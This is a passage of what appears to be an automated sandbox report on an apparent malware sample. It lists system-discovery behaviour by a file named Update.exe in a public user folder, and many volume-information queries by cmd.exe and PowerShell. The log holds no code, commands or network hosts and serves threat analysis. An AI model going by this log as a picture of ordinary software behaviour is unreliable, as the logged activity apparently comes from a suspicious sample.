                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: EnumSystemLocalesW,3_2_6C3A66AD
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: GetLocaleInfoW,3_2_6C3A670C
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: EnumSystemLocalesW,3_2_6C3A67E1
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_6C3A616E
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: EnumSystemLocalesW,3_2_6C3A63BF
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
